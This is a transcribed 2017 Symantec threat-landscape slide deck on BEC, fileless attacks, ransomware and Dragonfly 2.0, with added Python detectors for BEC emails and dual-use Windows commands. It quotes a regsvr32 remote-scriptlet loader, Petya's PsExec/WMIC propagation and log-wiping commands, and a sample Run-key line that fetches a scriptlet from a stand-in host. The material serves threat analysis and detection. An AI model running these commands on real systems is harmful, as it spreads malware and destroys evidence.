Threat landscape update: June to September 2017
- 2. General trends
Copyright © 2017 Symantec Corporation
Simple, but successful
o Low-tech attacks (BEC)
o Living off the land and fileless
o Emails with social engineering
Focused and selective
o More ransomware in corporations
o Selective spreading of malware
o Attacking supply chain companies
- 3. Malware statistics
o More than 2 Million new malware variants per day
o Script malware leads to many variants
Region % of global
USA 27.26%
Japan 6.49%
China 6.04%
India 5.82%
Brazil 4.12%
Germany 3.97%
Great Britain 3.59%
Canada 2.65%
France 2.55%
Russia 2.32%
Australia 2.17%
Italy 2.03%
Mexico 1.67%
South Korea 1.34%
Turkey 1.28%
Netherlands 1.27%
Spain 1.26%
Indonesia 1.11%
Poland 1.08%
Taiwan 0.90%
[Chart: new malware variants per month in millions, January to August]
- 4. Web attacks still elevated
o Normally no 0-day exploits used
o RIG toolkit is most active
o Link spread by email or advertisement
o Sometimes infections are restricted to specific IP addresses
o Supply chain attacks increased
[Chart: web attacks blocked per day, January to August]
- 5. Malicious documents still common
Malicious doc containing macro with social engineering
Embedded binary can be double clicked
- 6. Email
o More than half of the malicious attachments are script files
o Macros or JavaScript are usually downloading the final payload
o Most common payloads are ransomware and financial Trojans
Email (e.g. invoice or receipt) -> Attachment (e.g. JavaScript) -> Downloader (e.g. PowerShell) -> Payload (e.g. Ransomware)
Whitepaper available
- 8. Low-tech attacks: Business email compromise
o Spear-phishing taken to the next level
o Convince the company to perform a payment transaction
o Scams often use typo-squatted domains
o Some attacks change the IBAN in invoices
o Exposed losses Oct 2013 – Dec 2016 were over $5bn
o 8,000 businesses targeted monthly
[Chart: BEC emails received per targeted organization per month, Jan to Jun; monthly values between 4.3 and 6.8]
- 9. BEC subject lines
Top three subjects feature in 2/3 of all emails: PAYMENT, URGENT, REQUEST
Create a sense of urgency, requiring immediate action, attempting to pressure the recipient into action
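The two BEC traits on these slides, a typo-squatted sender domain and a subject built around PAYMENT / URGENT / REQUEST, are cheap to check at the mail gateway. The following is an added example written for this page, not code from Symantec or from the deck; the trusted domains, the homoglyph table and the sample messages are constructed, and the distance threshold of 2 is an assumption to tune per environment.

```python
"""Added example (not from the Symantec deck): triage an inbound message for two
BEC traits, a typo-squatted sender domain and an urgency-driven subject line.
Trusted domains and sample messages are constructed."""
import re

# Constructed: domains this organisation and its known suppliers really use.
TRUSTED_DOMAINS = {"example-corp.com", "examplecorp-invoices.com"}

# The three subject words the deck reports in two thirds of BEC emails.
URGENCY_WORDS = ("payment", "urgent", "request")

# Single-character substitutions commonly used to make a domain look like another.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def levenshtein(a: str, b: str) -> int:
    """Edit distance via the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalise(domain: str) -> str:
    """Lower-case and undo the common digit and letter-pair tricks (rn -> m, vv -> w)."""
    d = domain.strip().lower().translate(HOMOGLYPHS)
    return d.replace("rn", "m").replace("vv", "w")


def lookalike_of(sender_domain: str, trusted=TRUSTED_DOMAINS, max_distance: int = 2):
    """Return the trusted domain that sender_domain imitates, or None.
    An exact (case-insensitive) match is the real domain, not a lookalike."""
    if sender_domain.strip().lower() in trusted:
        return None
    norm = normalise(sender_domain)
    best = None
    for candidate in trusted:
        dist = levenshtein(norm, normalise(candidate))
        if dist <= max_distance and (best is None or dist < best[1]):
            best = (candidate, dist)
    return best[0] if best else None


def urgency_score(subject: str) -> int:
    """Count how many of the three headline BEC words appear in the subject."""
    words = set(re.findall(r"[a-z]+", subject.lower()))
    return sum(word in words for word in URGENCY_WORDS)


def triage(sender: str, subject: str) -> dict:
    """Combine both signals into a verdict a gateway rule or SOC playbook can act on."""
    domain = sender.rsplit("@", 1)[-1]
    imitates = lookalike_of(domain)
    urgency = urgency_score(subject)
    if imitates and urgency:
        verdict = "suspicious"   # lookalike sender pushing for urgent action
    elif imitates or urgency >= 2:
        verdict = "review"       # one strong signal, needs a human look
    else:
        verdict = "ok"
    return {"domain": domain, "imitates": imitates, "urgency": urgency, "verdict": verdict}


# Constructed sample messages.
SAMPLES = [
    ("ceo@examp1e-corp.com", "URGENT: payment request"),
    ("ceo@exarnple-corp.com", "Re: wire transfer"),
    ("accounts@example-corp.co", "Updated invoice"),
    ("ceo@example-corp.com", "URGENT: payment request"),
    ("news@unrelated-supplier.net", "Quarterly newsletter"),
]

if __name__ == "__main__":
    for sender, subject in SAMPLES:
        print(triage(sender, subject))
```

A legitimate sender with an urgent subject only reaches "review", which matches the deck's point: the subject line alone is pressure, and the lookalike domain is what turns pressure into a scam indicator. Invoice IBAN changes, the other trick listed, need a comparison against the supplier record and are out of scope here.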
- 10. Section 3: Living off the land
Whitepaper available
- 11. Living off the land
When attackers turn what you have against you
o Fewer new files on disk
  o more difficult to detect the attack, no IoC to share
o Use off-the-shelf tools & cloud services
  o difficult to determine intent & source
o These tools are ubiquitous
  o hiding in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult
  o use simple and proven methods such as email & social engineering
- 12. Fileless attacks
Multiple fileless options exist but not all are truly fileless
Memory only attacks: e.g. remote code exploits such as EternalBlue and CodeRed
Fileless loadpoint: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
Non-PE files: documents containing macros, PDFs with JavaScript and scripts (VBS, JavaScript, PowerShell,…)
Dual-use tools: using benign tools, such as PsExec, to do malicious things
- 13. Living off the land attack chain
Incursion
o Exploit in memory, e.g. SMB EternalBlue
o Email with Non-PE file, e.g. document macro
o Weak or stolen credentials, e.g. RDP password guess
o Remote script dropper, e.g. LNK with PowerShell from cloud
Persistence
o Non-persistent: memory only malware, e.g. SQL Slammer
o Persistent: fileless persistence loadpoint, e.g. JScript in registry
o Persistent: traditional methods
Payload
o Regular non-fileless payload
o Non-PE file payload, e.g. PowerShell script
o Memory only payload, e.g. Mirai DDoS
o Dual-use tools, e.g. netsh or PsExec.exe
- 14. Non-PE files
o Scripts are very common, especially PowerShell
o Many script toolkits available, e.g. PS Empire
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be adapted quickly
Whitepaper available
- 15. Fileless loadpoints
Example: Remote SCT load
o Registry run key can point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Malicious .sct file
Downloader.Dromedan (40,000 detections per day)
o Embedded JScript uses WMI to execute a PowerShell payload
o Script stores encoded DLL in the registry for later use
- 17. Ransomware stats
o Ransomware is still profitable and common
o Multiple self-propagating variants appeared
[Chart: ransomware per month, Jan-16 to Jun-17, with trend line]
Share by country: United States 29%, Japan 9%, Italy 8%, India 4%, Germany 4%, Netherlands 3%, UK 3%, Australia 3%, Russia 3%, Canada 3%, other countries 31%
- 18. Ransomware in enterprises
o 42% of ransomware infections in 2017 were in enterprises
  o Due to WannaCry and Petya
o Attacks against cloud storage increased
[Chart: ransomware infections per month, consumer vs enterprise, Jan-16 to Jun-17]
- 19. WannaCry
o 1 Billion EternalBlue infection attempts blocked
o Profit $140K, Bitcoin accounts emptied August 3rd
o Linked to Lazarus group
[Chart: scale 0 to 120,000; series and axis labels not recovered]
- 20. Petya
o Petya (June variant) classified as a wiper
o Semi-targeted infections through supply chain hack (MEDoc)
o Profit $10K, Bitcoin account emptied July 4th
[Chart: scale 0 to 160; series and axis labels not recovered]
- 21. Petya uses dual-use tools
o Threat is a DLL executed by rundll32.exe
o Uses recompiled version of LSADump Mimikatz to get passwords
o Uses PsExec to propagate
  o \\[server_name]\admin$\perfc.dat
  o psexec rundll32.exe c:\windows\perfc.dat #1 [RANDOM]
o Uses WMI to propagate if PsExec fails
  o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe "%Windows%\perfc.dat" #1 60"
o Scheduled task to restart into the malicious MBR payload
  o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
o Deletes log files to hide traces
  o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
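Every command on this slide is a legitimate Windows tool, which is the deck's point: none of them is an indicator on its own, so detection has to look at the combination on a host. The block below is an added example written for this page, not Symantec code, covering both the regsvr32 remote-SCT loadpoint from the fileless loadpoints slide (slide 15) and the Petya command chain here. The rule names, stage labels, verdict strings, host names, registry values and event records are all constructed; the command lines mirror the shapes shown on the two slides with placeholders where the slides use them.

```python
"""Added example, not from the Symantec deck: a small rule set over process
command lines that flags the dual-use tool patterns on the Petya slide
(rundll32 with an ordinal export, PsExec and WMIC lateral movement, a scheduled
forced reboot, wevtutil/fsutil log wiping) and the regsvr32 remote-SCT loadpoint
from the fileless loadpoints slide.  Events, hosts and registry values below are
constructed sample data."""
import re
from collections import defaultdict

# (rule name, attack stage, pattern over the command line), case-insensitive.
RULES = [
    ("regsvr32_sct_scrobj", "loadpoint",
     re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:\S+.*\bscrobj\.dll\b", re.I)),
    ("rundll32_ordinal_export", "execution",
     re.compile(r"\brundll32(\.exe)?\b.*\.dat\b\W*#\d+", re.I)),
    ("psexec_remote_exec", "lateral",
     re.compile(r"\bpsexec(\.exe)?\b", re.I)),
    ("wmic_remote_process_create", "lateral",
     re.compile(r"\bwmic(\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b", re.I)),
    ("schtasks_forced_reboot", "impact",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*\bshutdown(\.exe)?\s+/r\b", re.I)),
    ("wevtutil_clear_log", "antiforensics",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("fsutil_delete_usn_journal", "antiforensics",
     re.compile(r"\bfsutil(\.exe)?\s+usn\s+deletejournal\b", re.I)),
]


def match_rules(cmdline: str) -> list:
    """Return (name, stage) for every rule whose pattern matches the command line."""
    return [(name, stage) for name, stage, rx in RULES if rx.search(cmdline)]


def scan_autoruns(values: dict) -> list:
    """Apply the loadpoint rules to Run-key value data ({value name: data}).
    Returns the value names whose data would make regsvr32 fetch a scriptlet."""
    return [name for name, data in values.items()
            if any(stage == "loadpoint" for _, stage in match_rules(data))]


def assess_hosts(events: list) -> dict:
    """Group matches per host; the verdict depends on which stages occur together,
    because each tool alone is routine administration on many networks."""
    rules_by_host = defaultdict(set)
    stages_by_host = defaultdict(set)
    for ev in events:
        for name, stage in match_rules(ev["cmdline"]):
            rules_by_host[ev["host"]].add(name)
            stages_by_host[ev["host"]].add(stage)
    report = {}
    for host in sorted({ev["host"] for ev in events}):
        stages = stages_by_host[host]
        if "antiforensics" in stages and "lateral" in stages:
            verdict = "high: lateral movement followed by log wiping"
        elif "lateral" in stages and stages & {"execution", "impact"}:
            verdict = "high: remote execution with payload staging"
        elif stages:
            verdict = "low: single dual-use tool, review context"
        else:
            verdict = "clean"
        report[host] = {"rules": sorted(rules_by_host[host]), "verdict": verdict}
    return report


# Constructed process-creation events shaped like the commands on the Petya slide
# (bracketed names are placeholders, not real hosts or accounts).
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": r"rundll32.exe C:\Windows\perfc.dat #1 30"},
    {"host": "ws01", "cmdline": r"psexec rundll32.exe c:\windows\perfc.dat #1 30"},
    {"host": "ws01", "cmdline": r'wmic.exe /node:[IP_ADDRESS] /user:[USERNAME] /password:[PASSWORD] '
                                r'process call create "%System%\rundll32.exe %Windows%\perfc.dat #1 60"'},
    {"host": "ws01", "cmdline": r'schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42'},
    {"host": "ws01", "cmdline": r"wevtutil cl Setup & wevtutil cl System & fsutil usn deletejournal /D %c:"},
    {"host": "ws02", "cmdline": r"psexec \\[build_server] ipconfig /all"},   # routine admin use
    {"host": "ws03", "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# Constructed Run-key values: one remote-SCT loadpoint, one ordinary sync client.
SAMPLE_AUTORUNS = {
    "Updater": r"regsvr32 /s /n /u /i:http://example.invalid/update.sct scrobj.dll",
    "Sync": r"C:\Users\[USER]\AppData\Local\SyncClient.exe /background",
}

if __name__ == "__main__":
    for host, result in assess_hosts(SAMPLE_EVENTS).items():
        print(host, result)
    print("loadpoint values:", scan_autoruns(SAMPLE_AUTORUNS))
```

The host that only ran PsExec lands at "low" and the host that combined lateral movement with wevtutil and fsutil lands at "high", which is the correlation a SOC needs when the individual tools cannot be blocked. In production the rules would run over Sysmon or Windows 4688 process-creation events and an autoruns export, and the thresholds and stage names would be adapted to the environment.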
- 23. Dragonfly 2.0
o Active since December 2015 in Europe and North America
o Ongoing attacks against energy sector, mainly in Turkey and U.S.
Infiltration
o Compromised websites and spear phishing (Phishery toolkit)
o Trojanized software, using Shellter evasion framework
o Various backdoors:
  • Trojan.Listrix
  • Trojan.Credrix
  • Backdoor.Goodor
  • Backdoor.Dorshell
  • Trojan.Karagany.B
  • Trojan.Heriplor
Slide deck available
- 24. Dragonfly 2.0
o Uses living off the land tactics
  o PowerShell, PsExec, and BITSAdmin
  o Phishery toolkit became available on GitHub in 2016
  o Document used SMB template link to leak credentials
  o Screenutil and Shellter are available online
Goal
o Information stealing: passwords, documents and screenshots
o Potential for sabotage attacks
- 25. Supply chain attacks increasing
o Many cases where legitimate software was compromised
o Fast and semi-targeted distribution through update process
o Trojanized updates are difficult to discover
  o Trusted domain, digitally signed, trusted update process,…
Examples:
o MEDoc (Petya June/2017)
o CCleaner (Aug/2017)
o Python modules (Sept/2017)
o ICS supplier (Dragonfly 2014)
- 26. Summary
o Cybercriminals are focusing on simple but effective methods
o Ransomware is still very prevalent
o Living off the land tactics are increasingly used
o Often targeted infections with limited distribution
Editor's Notes
- https://www.symantec.com/security_response/publications/monthlythreatreport.jsp
- https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/